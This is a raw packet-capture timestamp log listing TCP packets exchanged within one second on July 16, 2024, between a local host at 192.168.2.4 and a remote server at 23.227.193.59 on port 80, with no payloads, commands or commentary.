                                                                            Jul 16, 2024 22:29:51.110898018 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.110937119 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.110953093 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.110968113 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.110980988 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.110991955 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.111027956 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.111164093 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.111179113 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.111193895 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.111208916 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.111221075 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.111224890 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.111253023 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.111366034 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.111382008 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.111407042 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.111641884 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.111690998 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.111700058 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.111715078 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.111752987 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.111856937 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.111871958 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.111885071 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.111898899 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.111913919 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.111933947 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.111982107 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.112015009 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.112030029 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.112044096 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.112056971 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.112060070 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.112088919 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.112252951 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.112268925 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.112304926 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.112317085 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.112365007 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.112413883 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.112428904 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.112443924 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.112459898 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.112468004 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.112508059 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.112716913 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.112731934 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.112746954 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.112762928 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.112777948 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.112793922 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.112808943 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.112833977 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.112878084 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.113117933 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.113132954 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.113147020 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.113162041 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.113164902 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.113177061 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.113193035 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.113202095 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.113208055 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.113223076 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.113236904 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.113238096 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.113254070 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.113265991 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.113292933 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.113575935 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.113591909 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.113605976 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.113620996 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.113621950 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.113636971 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.113668919 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.113703966 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.113922119 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.113936901 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.113950968 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.113966942 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.113979101 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.113982916 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.113998890 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.114006996 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.114013910 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.114028931 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.114042997 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.114043951 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.114058018 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.114068031 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.114072084 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.114098072 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.114304066 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.114317894 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.114331961 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.114346027 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.114348888 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.114362001 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.114367962 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.114376068 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.114403963 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.166002035 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.198627949 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.198672056 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.198729992 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.198731899 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.198769093 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.198802948 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.198813915 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.198837996 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.198872089 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.198894024 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.198909044 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.198941946 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.198966980 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.198975086 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.199007988 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.199019909 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.199043989 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.199079990 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.199090004 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.199112892 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.199146032 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.199166059 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.199179888 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.199244976 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.199879885 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.199934006 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.199970007 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.199982882 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.200004101 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.200041056 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.200068951 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.200073957 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.200129032 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.200129986 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.200170994 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.200211048 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.200217962 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.200241089 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.200273991 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.200290918 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.200308084 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.200340986 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.200347900 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.200375080 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.200408936 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.200419903 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.200546026 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.200577974 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.200593948 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.200612068 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.200647116 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.200658083 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.200679064 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.200711966 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.200726986 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.200746059 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.200778961 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.200789928 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.200814962 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.200870991 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.201028109 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.201061010 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.201092958 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.201114893 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.201127052 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.201164007 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.201172113 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.201214075 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.201248884 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.201263905 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.201286077 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.201337099 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.201755047 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.201792002 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.201827049 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.201838970 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.201994896 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.202043056 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.202047110 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.202081919 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.202114105 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.202125072 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.202147961 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.202183008 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.202193975 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.202409029 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.202442884 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.202464104 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.202476978 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.202510118 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.202523947 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.202545881 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.202578068 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.202593088 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.203089952 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.203145981 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.203239918 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.203274965 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.203321934 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.203423023 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.203457117 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.203490019 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.203501940 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.203524113 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.203561068 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.203568935 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.203589916 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.203639030 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.203639984 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.203674078 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.203706980 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.203722954 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.203741074 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.203785896 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.203793049 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.203828096 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.203860044 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.203877926 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.203898907 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.203989983 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.204006910 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.204025030 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.204058886 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.204073906 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.204097033 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.204142094 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.204152107 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.204186916 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.204221010 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.204237938 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.204253912 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.204298019 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.204324961 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.204358101 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.204391956 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.204404116 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.204427004 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.204452991 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.204469919 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.204473972 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.204495907 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.204508066 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.204511881 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.204556942 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.204842091 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.204866886 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.204883099 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.204899073 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.204911947 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.204915047 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.204958916 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.205009937 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.205024958 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.205040932 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.205053091 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.205055952 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.205071926 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.205087900 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.205127001 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.205374956 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.205390930 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.205405951 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.205420971 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.205437899 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.205446959 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.205452919 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.205470085 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.205482960 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.205486059 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.205502033 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.205502987 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.205518007 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.205534935 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.205543041 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.205578089 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.205909014 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.205924988 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.205940962 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.205955029 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.205955982 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.205971003 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.206002951 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.206037998 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.450850010 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.450897932 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.450915098 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.450985909 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.451000929 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.451008081 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.451024055 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.451041937 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.451045036 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.451093912 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.451148987 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.451164961 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.451189041 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.451198101 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.451205015 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.451220036 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.451236010 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.451237917 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.451251984 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.451277971 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.451298952 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.451484919 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.451499939 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.451514959 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.451546907 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.451637030 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.451653004 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.451666117 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.451682091 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.451683998 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.451697111 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.451710939 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.451711893 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.451726913 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.451741934 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.451755047 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.451756001 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.451771975 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.451781034 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.451787949 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.451805115 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.451805115 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.451821089 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.451843977 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.451879025 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.452419043 CEST804973023.227.193.59192.168.2.4
